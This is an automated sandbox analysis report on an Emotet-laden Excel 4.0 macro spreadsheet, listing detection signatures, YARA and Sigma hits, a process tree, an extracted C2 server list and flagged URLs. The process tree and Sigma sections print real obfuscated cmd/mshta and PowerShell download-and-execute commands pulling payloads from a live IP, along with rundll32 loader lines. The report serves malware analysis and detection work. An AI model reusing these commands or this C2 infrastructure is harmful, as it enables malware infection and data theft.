Windows Analysis Report
364453688149503140239183.xls

Overview

General Information

Sample Name: 364453688149503140239183.xls
Analysis ID: 562430
MD5: 4097bbda61bfb39067eab29fb342e34e
SHA1: ca13a07a1eb59e7b30f217239a0db63235354c49
SHA256: 4d876f4afaf9df30d8b9ecaeddd86defa6dedd94dcaa933d67fe578b9cabdc18
Tags: SilentBuilder, xls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2232 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1760 cmdline: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2840 cmdline: mshta http://91.240.118.168/vvv/ppp/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 3004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2852 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 1180 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2672 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2916 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1200 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2424 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2144 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source | Rule | Description | Author | Strings
Source: 364453688149503140239183.xls | Rule: SUSP_Excel4Macro_AutoOpen | Description: Detects Excel4 macro use with auto open / close | Author: John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x96a2:$s1: Excel
  • 0xa705:$s1: Excel
  • 0x32a3:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: 364453688149503140239183.xls | Rule: JoeSecurity_XlsWithMacro4 | Description: Yara detected Xls With Macro 4.0 | Author: Joe Security

Source | Rule | Description | Author | Strings
Source: C:\Users\user\Desktop\364453688149503140239183.xls | Rule: SUSP_Excel4Macro_AutoOpen | Description: Detects Excel4 macro use with auto open / close | Author: John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x96a2:$s1: Excel
  • 0xa705:$s1: Excel
  • 0x32a3:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: C:\Users\user\Desktop\364453688149503140239183.xls | Rule: JoeSecurity_XlsWithMacro4 | Description: Yara detected Xls With Macro 4.0 | Author: Joe Security
Source: C:\ProgramData\QWER.dll | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Source | Rule | Description | Author | Strings
Source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
(5 of 71 entries shown)

Source | Rule | Description | Author | Strings
Source: 12.2.rundll32.exe.2a0000.0.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 10.2.rundll32.exe.170000.0.raw.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 11.2.rundll32.exe.200000.1.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 17.2.rundll32.exe.2e90000.16.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 12.2.rundll32.exe.2850000.9.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
(5 of 105 entries shown)

                            System Summary

Source: File created | Author: Florian Roth | Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2840, TargetFilename: C:\Users\user\AppData\Local
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004
Source: Process started | Author: Florian Roth | Data: Command: mshta http://91.240.118.168/vvv/ppp/fe.html, CommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1760, ProcessCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ProcessId: 2840
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, CommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2232, ProcessCommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, ProcessId: 1760
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004

                            AV Detection

Source: http://91.240.118.168/vvv/ppp/fe.htmlWinSta0 | Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe | Avira URL Cloud: Label: malware
Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/ | Avira URL Cloud: Label: malware
Source: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/ | Avira URL Cloud: Label: phishing
Source: http://91.240.118.168/vvv/ppp/fe.htmlv1.0 | Avira URL Cloud: Label: malware
Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/ | Avira URL Cloud: Label: phishing
Source: http://ayoobeducationaltrust.in | Avira URL Cloud: Label: phishing
Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/ | Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.pngPE3 | Avira URL Cloud: Label: malware
Source: http://cmit.valestudios.com/wp-a | Avira URL Cloud: Label: malware
Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3 | Avira URL Cloud: Label: malware
Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3 | Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlmshta | Avira URL Cloud: Label: malware
Source: http://test.valestudios.com/wp-c | Avira URL Cloud: Label: malware
Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3 | Avira URL Cloud: Label: phishing
Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/ | Avira URL Cloud: Label: malware
Source: http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3 | Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.png | Avira URL Cloud: Label: malware
Source: http://test.dreamcityorlando.com | Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlC: | Avira URL Cloud: Label: malware
Source: http://curvygirlsboutique.com/jf | Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.html3 | Avira URL Cloud: Label: malware
Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3 | Avira URL Cloud: Label: malware
Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3 | Avira URL Cloud: Label: phishing
Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/ | Avira URL Cloud: Label: malware
